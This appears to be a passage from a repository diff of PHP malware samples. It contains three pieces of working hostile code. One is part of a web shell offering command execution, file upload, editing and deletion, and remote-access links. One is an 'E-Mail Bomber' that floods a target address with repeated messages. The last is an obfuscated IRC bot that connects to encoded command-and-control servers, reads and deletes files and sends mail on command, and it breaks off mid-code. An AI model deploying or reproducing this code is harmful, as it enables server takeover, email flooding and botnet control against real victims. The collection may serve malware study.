echo "<input type=\"submit\" value=\"Save\" name=\"B2\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\">&nbsp;";
echo "<input type=\"button\" value=\"Closes Publisher\" Onclick=\"javascript:window.location='{$fstring}&amp;chdir={$chdir}'\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\">&nbsp;";
echo "</form>";
echo "</td>";
echo "</tr>";
echo "</table>";
}
elseif (@$_GET['action'] == 'save') {
$filename = "$chdir".$_GET['file'];
$somecontent = $_POST['S1'];
$somecontent = stripslashes(trim($somecontent));
if (is_writable($filename)) {
@$handle = fopen ($filename, "w");
@$fw = fwrite($handle, $somecontent);
@fclose($handle);
if ($handle && $fw) {
$msg = "<font color=\"#000080\">{$_GET['file']}</font>,&nbsp;<font color=\"#008000\">edited&nbsp;successfully!</font>";
}
} else {
$msg = "<font color=\"#000000\">{$_GET['file']},</font>&nbsp;<font color=\"#FF0000\">cannot&nbsp;be&nbsp;written!</font>";
}
}
// Informações
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
$cmdget = htmlspecialchars($cmdget);
function asdads() {
$asdads = '';
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget&nbsp;"; }
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch&nbsp;"; }
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl&nbsp;"; }
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET&nbsp;"; }
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx&nbsp;"; }
return $asdads;
}
echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo "<legend>Informações</legend>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Sistema:</b>&nbsp;</td></p>";
echo "<td width=\"92%\">&nbsp;{$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Uname:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>PHP:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$PHPv},&nbsp;<b>safe mode:</b>&nbsp;{$SafeMode}</td>";
echo "</tr>";
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
$Methods = asdads();
if ($Methods == '') { $Methods = "???"; }
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Methods:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$Methods}</td>";
echo "</tr>";
}
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Ip:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Command:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;<input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\">&nbsp;<input type=\"submit\" name=\"action\" value=\"Send\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"></td>";
echo "</tr>";
echo "</table>";
echo "</fieldset></form>";
// Dir
echo "<form method=\"POST\" action=\"{$fstring}&amp;action=upload&amp;chdir=$chdir\" enctype=\"multipart/form-data\">";
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid #000000; padding: 2\">";
if (is_writable("$chdir")) {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir&nbsp;<b>YES</b>:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser\">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir&nbsp;<b>YES</b>:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes\">[BackTool]</a></legend>";
}
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir&nbsp;NO:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}\">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir&nbsp;NO:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no\">[BackTool]</a></legend>";
}
}
if (@!$handle = opendir("$chdir")) {
echo "&nbsp;I&nbsp;could&nbsp;not&nbsp;enters&nbsp;in&nbsp;the&nbsp;directory,&nbsp;<a href=\"{$fstring}\">click here!</a>&nbsp;for&nbsp;return&nbsp;to&nbsp;the&nbsp;original&nbsp;directory!</br>";
}
else {
echo " <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">&nbsp;Upload:";
echo " <input type=\"file\" name=\"userfile\" size=\"91\" style=\"font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1\">";
echo " <input type=\"submit\" value=\"Send\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"></td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">&nbsp;</td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">";
if (@!$msg) {
echo " <p align=\"left\">Messages</td>";
} else {
echo " <p align=\"left\">$msg</td>";
}
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\">&nbsp;</td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"9%\">&nbsp;Perms</td>";
echo " <td width=\"49%\">&nbsp;File </td>";
echo " <td width=\"10%\">&nbsp;Size </td>";
echo " <td width=\"32%\">&nbsp;Commands</td>";
echo " </tr>";
$colorn = 0;
while (false !== ($file = readdir($handle))) {
if ($file != '.') {
if ($colorn == 0) {
$color = "style=\"background-color: #FFCC66\"";
}
elseif ($colorn == 1) {
$color = "style=\"background-color: #C0C0C0\"";
}
if (@is_dir("$chdir"."$file")) {
$file = $file.'/';
$mode = 'chdir';
} else {
$mode = 'edit';
}
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
$chdir .= '/';
}
if ($file == '../') {
$lenpath = strlen($chdir); $baras = 0;
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
$chdir_ = explode("/", $chdir);
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
}
$perms = @fileperms ("$chdir"."$file");
if ($perms == '') {
$perms = '???';
}
$size = @filesize ("$chdir"."$file");
$size = $size / 1024;
$size = explode(".", $size);
if (@$size[1] != '') {
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
} else {
$size = $size[0];
}
if ($size == 0) {
if ($mode == 'chdir') {
$size = '???';
}
}
echo "<tr>";
echo "<td width=\"9%\" $color>&nbsp;$perms</td>";
if (@is_writable ("$chdir"."$file")) {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a></b></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></b></td>";
}
} else {
if (is_readable("$chdir"."$file")) {
echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a></b></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;<b>$file</b></td>";
}
}
}
else {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></td>";
}
} else {
if (@is_readable("$chdir"."$file")) {
echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;$file</td>";
}
}
}
echo "<td width=\"10%\" $color>&nbsp;$size&nbsp;KB</td>";
if ($mode == 'edit') {
echo "<td width=\"32%\" $color>&nbsp;<a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a>&nbsp;<a href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">[Del]</a>&nbsp;<a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a>&nbsp;<a href=\"#{$file}\" onclick=\"Copy('{$chdir}', '{$file}')\">[Copy]</a></td>";
} else {
echo "<td width=\"32%\" $color>&nbsp;<a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a>&nbsp;<a href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">[Del]</a>&nbsp;<a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a>&nbsp;[Copy]</td>";
}
echo "</tr>";
if ($colorn == 0) {
$colorn = 1;
}
elseif ($colorn == 1) {
$colorn = 0;
}
}
}
closedir($handle);
}
?>
</table>
</fieldset></form>
<p align="center">
<a href="http://validator.w3.org/check?uri=referer"><img
src="http://www.w3.org/Icons/valid-html401"
alt="Valid HTML 4.01 Transitional" height="31" width="88"></a>
</p>
</body>
</html>

69
PHP/Flooder.PHP.MailSpam Normal file
View File

@ -0,0 +1,69 @@
<?php
if (!$mailstart) {
?>
<html>
<head>
<title>[- Xp|01t3R's -] - E-Mail Bomber</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<h3><font face="Verdana, Arial, Helvetica, sans-serif"><b>[*CyBeR tErRoRiStS*]
- E-Mail Bomber <br>
</b></font></h3>
<form name="own" method="post" action="<? echo $PHP_SELF; ?>">
<p><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><b>To:
<input type="text" name="to">
<input type="hidden" name="mailstart" value="2">
<br>
From:
<input type="text" name="from">
</b></font></p>
<p><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Subject :
<input type="text" name="subject" size="100">
<br>
<br>
Message:<br>
<textarea name="message" rows="5" cols="100"></textarea>
</font></b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
<br>
<b>Number Of Times To Send:</b>
<input type="text" name="times" size="4">
<br>
<input type="submit" name="Send" value="Send">
<input type="reset" name="Reset" value="Reset">
</font></p>
</form>
<h3><font face="Verdana, Arial, Helvetica, sans-serif"><b> </b></font> </h3>
</body>
</html>
<?
} else {
$i = 0;
while ($i < $times) {
$headers .= "From: $from<$from>\n";
$headers .= "X-Sender: <$from>\n";
$headers .= "X-Mailer: PHP\n"; //mailer
$headers .= "X-Priority: 1\n"; //1 UrgentMessage, 3 Normal
$headers .= "Return-Path: <$from>\n";
$headers .= "Content-Type: text/html; charset=iso-8859-1\n";
$headers .= "cc:\n"; // CC to
$headers .= "bcc:"; // BCCs to, separete
mail($to, $subject, $message, $headers) or die("Could Not Send Message");
$i++;
}
die("Finished Sending Message $times Times to $to");
}
?>

128
PHP/HackTool.PHP.Botctl.a Normal file
View File

@ -0,0 +1,128 @@
<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); $aec12e0af93cb5 = array ( "po" => 8080, "sp" => "uJijk4iVsIXRmQ==",
"ch" => "aFaw", "ke" => "spd1iYSUqA==", "ha" => "dG1qQk1halK/nE6N", "pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=",
"tr" => "*", "mrnd" => 9, "mo" => "cqtrig==", "ve" => "dmFyWA==" ); function tc8a89c2c306fb($m341be97d9aff9) {
$m341be97d9aff9 = str_replace(" ", "", $m341be97d9aff9); return $m341be97d9aff9; } function ob5d21085bf2c0($m341be97d9aff9) {
$m341be97d9aff9 = base64_decode(tc8a89c2c306fb($m341be97d9aff9)); return $m341be97d9aff9; } function rfc35fdc70d5fc() {
global $aec12e0af93cb5; $see11cbb19052e = array(); $td707b8140a662 = ""; $b59b514174bffe = array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWVKHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo5eMipjHlm6RiZU=");
shuffle($b59b514174bffe); if(($j351a1d2ad68bc = fsockopen(jf9feaa9bcab30($b59b514174bffe[0]),$aec12e0af93cb5['po'],$k70106d0d82151,$d809b1abe3f111,15))) {
$m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); if (strlen($aec12e0af93cb5['sp'])>0) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UEFTUw==")." ".jf9feaa9bcab30($aec12e0af93cb5['sp']));
} q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("VVNFUg==")." ".gfb0daa8f01135($aec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$m8052146769b14");
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); while (!feof($j351a1d2ad68bc)) {
$f7fabc1404929c = trim(fgets($j351a1d2ad68bc,512)); $h6e2baaf3b97db = explode(" ",$f7fabc1404929c);
if(($f7fabc1404929c == $td707b8140a662)) continue; if (isset($h6e2baaf3b97db[0]) && $h6e2baaf3b97db[0] == ob5d21085bf2c0("UElORw==")) {
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UE9ORw==")." ".$h6e2baaf3b97db[1]); } else if (isset($h6e2baaf3b97db[1]) && $h6e2baaf3b97db[1] == ob5d21085bf2c0("MDAx")) {
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TU9ERQ==")." $m8052146769b14 ".jf9feaa9bcab30($aec12e0af93cb5['mo']));
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("Sk9JTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ch'])." ".jf9feaa9bcab30($aec12e0af93cb5['ke']));
} else if(isset($zdfff0a7fa1a55[1]) && $zdfff0a7fa1a55[1] == ob5d21085bf2c0("NDMz")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} else if (isset($h6e2baaf3b97db[1]) && isset($see11cbb19052e[$h6e2baaf3b97db[1]])) { unset($see11cbb19052e[$h6e2baaf3b97db[1]]);
} else if (isset($h6e2baaf3b97db[1]) && ($h6e2baaf3b97db[1] == ob5d21085bf2c0("UFJJVk1TRw==") || $h6e2baaf3b97db[1] == "332")) {
$n78e731027d8fd = strstr($f7fabc1404929c," :"); $n78e731027d8fd = substr($n78e731027d8fd,2); $zdfff0a7fa1a55 = explode(" ",$n78e731027d8fd);
$m67b3dba8bc677 = $h6e2baaf3b97db[0]; $v7c6483ddcd99e = explode("!",$m67b3dba8bc677); $v7c6483ddcd99e = substr($v7c6483ddcd99e[0],1);
$d73be252ca8221 = FALSE; if ($zdfff0a7fa1a55[0] == "\1".ob5d21085bf2c0("VkVSU0lPTg==")."\1") { q56eacb300613d($j351a1d2ad68bc,"NOTICE ".$v7c6483ddcd99e." :\1".ob5d21085bf2c0("VkVSU0lPTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ve'])."\1");
} for ($i865c0c0b4ab0e=0;$i865c0c0b4ab0e<count($zdfff0a7fa1a55);$i865c0c0b4ab0e++) { if($zdfff0a7fa1a55[$i865c0c0b4ab0e] == "-s") {
$d73be252ca8221 = TRUE; } } if ($h6e2baaf3b97db[1] == "332") { $e01b6e20344b68 = $h6e2baaf3b97db[3];
} elseif ($h6e2baaf3b97db[2] == $m8052146769b14) { $e01b6e20344b68 = $v7c6483ddcd99e; } else { $e01b6e20344b68 = $h6e2baaf3b97db[2];
} if ($zdfff0a7fa1a55[0] == PHP_OS) { array_shift($zdfff0a7fa1a55); } if (substr($zdfff0a7fa1a55[0],0,1) == $aec12e0af93cb5['tr']) {
if (isset($see11cbb19052e[$m67b3dba8bc677]) || $h6e2baaf3b97db[1] == "332") { switch (substr($zdfff0a7fa1a55[0],1)) {
case l69923efad5b7a("sKM="): if ($h6e2baaf3b97db[1] != "332") { $see11cbb19052e[$m67b3dba8bc677] = FALSE;
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, htmen("b3V0")); } break; case l69923efad5b7a("qGWaoKKb"):
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UVVJVCA6SSBRVUlU")); fclose($j351a1d2ad68bc); exit(0);
break; case l69923efad5b7a("tpWs"): if (count($zdfff0a7fa1a55)>1) { q56eacb300613d($j351a1d2ad68bc, substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
} break; case l69923efad5b7a("sKc="): if (isset($zdfff0a7fa1a55[1])) { $u954eef6d6eac5 = $zdfff0a7fa1a55[1];
} else { $u954eef6d6eac5 = getcwd(); } if (is_dir($u954eef6d6eac5)) { if (($o736007832d216 = opendir($u954eef6d6eac5))) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8gTm93IGxpc3Rpbmc6") ." \2".$u954eef6d6eac5."\2");
while (($k435ed7e9f07f7 = readdir($o736007832d216)) !== FALSE) { if ($k435ed7e9f07f7 != "." && $k435ed7e9f07f7 != "..") {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> (".filetype($u954eef6d6eac5."/".$k435ed7e9f07f7).") $k435ed7e9f07f7");
sleep(1); } } closedir(); } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y=") . " \2".$u954eef6d6eac5."\2");
} } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8=") . " \2".$u954eef6d6eac5."\2 " . ob5d21085bf2c0("aXMgbm90IGEgZGlyIQ=="));
} break; case l69923efad5b7a("p5Wp"): if (count($zdfff0a7fa1a55) > 1) { if (is_file($zdfff0a7fa1a55[1])) {
if (($k0666f0acdeed3 = fopen($zdfff0a7fa1a55[1],"r"))) { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=") . " \2".$zdfff0a7fa1a55[1]."\2");
while(!feof($k0666f0acdeed3)) { $m6438c669e0d0d = trim(fgets($k0666f0acdeed3,256)); df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> $m6438c669e0d0d");
sleep(1); } df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> [EOF]"); } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8gQ291bGRuJ3Qgb3Blbg==") . " \2".$zdfff0a7fa1a55[1]."\2 for reading.");
} } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8=") . " \2".$zdfff0a7fa1a55[1]."\2 " . ob5d21085bf2c0("aXMgbm90IGEgZmlsZQ=="));
} } break; case l69923efad5b7a("tKuZ"): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("UFdELy8gQ3VycmVudCBkaXI6") ." ".getcwd());
break; case l69923efad5b7a("p5g="): if (count($zdfff0a7fa1a55) > 1) { if (chdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0QvLyBDaGFuZ2VkIGRpciB0bw==") ." ".$zdfff0a7fa1a55[1]);
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg=="));
} } break; case l69923efad5b7a("tqE="): if (count($zdfff0a7fa1a55) > 1) { if (unlink($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk0vLyBEZWxldGVk") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl")." \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("uKOqlZs="): if (count($zdfff0a7fa1a55) > 1) { if (touch($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VG91Y2gvLyBUb3VjaGVk") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("t62inpySoA=="): if (count($zdfff0a7fa1a55) > 2) { if (symlink($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3ltTGluay8vIFN5bWxpbmtlZA==") . " \2".$zdfff0a7fa1a55[2]."\2 To \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r") . " \2".$zdfff0a7fa1a55[2]."\2 To \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("p5ykqaE="): if (count($zdfff0a7fa1a55) > 2) { if (chown($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2hvd24vLyBDaG93bmVk") ." \2".$zdfff0a7fa1a55[1]."\2 To \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=") ." \2".$zdfff0a7fa1a55[1]."\2 To \2".$zdfff0a7fa1a55[2]."\2");
} } break; case l69923efad5b7a("p5yioZc="): if (count($zdfff0a7fa1a55) > 2) { if(chmod($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2htb2QvLyBDaG1vZGRlZA==") . " \2".$zdfff0a7fa1a55[1]."\2 with permissions \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("sZ+Zm6U="): if (count($zdfff0a7fa1a55) > 1) { if (mkdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==")." \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==")." \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("tqGZm6U="): if (count($zdfff0a7fa1a55)>1) { if (rmdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("p6Q="): if (count($zdfff0a7fa1a55) > 2) { if (copy($zdfff0a7fa1a55[1], $zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q1AvLyBDb3BpZWQ=") ." \2".$zdfff0a7fa1a55[1]."\2 to \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q1AvLyBGYWlsZWQgdG8gY29weQ==") ." \2".$zdfff0a7fa1a55[1]."\2 to \2".$zdfff0a7fa1a55[2]."\2");
} } break; case l69923efad5b7a("sZWeng=="): if (count($zdfff0a7fa1a55)>4) { $p099fb995346f3 = "From: <".$zdfff0a7fa1a55[2].">\r\n";
if (mail($zdfff0a7fa1a55[1], $zdfff0a7fa1a55[3], substr($n78e731027d8fd,$zdfff0a7fa1a55[4]), $p099fb995346f3)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TWFpbC8v") . " Message sent to \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TWFpbC8v") . " Send failure");
} } break; case l69923efad5b7a("sZ+ilmg="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUQ1Ly8=") . " ".md5($zdfff0a7fa1a55[1]));
break; case l69923efad5b7a("qKKo"): if (isset($zdfff0a7fa1a55[1])) { $m957b527bcfbad = explode(".",$zdfff0a7fa1a55[1]);
if (count($m957b527bcfbad)==4 && is_numeric($m957b527bcfbad[0]) && is_numeric($m957b527bcfbad[1]) && is_numeric($m957b527bcfbad[2]) && is_numeric($m957b527bcfbad[3])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RE5TLy8=") . " ".$zdfff0a7fa1a55[1]." -> ".gethostbyaddr($zdfff0a7fa1a55[1]));
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RE5TLy8=") . " ".$zdfff0a7fa1a55[1]." -> ".gethostbyname($zdfff0a7fa1a55[1]));
} } break; case l69923efad5b7a("tpmoppSWqQ=="): q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UVVJVCA6UVVJVC4uLg=="));
fclose($j351a1d2ad68bc); rfc35fdc70d5fc(); break; case l69923efad5b7a("tqI="): if(isset($zdfff0a7fa1a55[1])) {
$m8052146769b14 = ad988971435842((int)$zdfff0a7fa1a55[1]); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} else { $m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
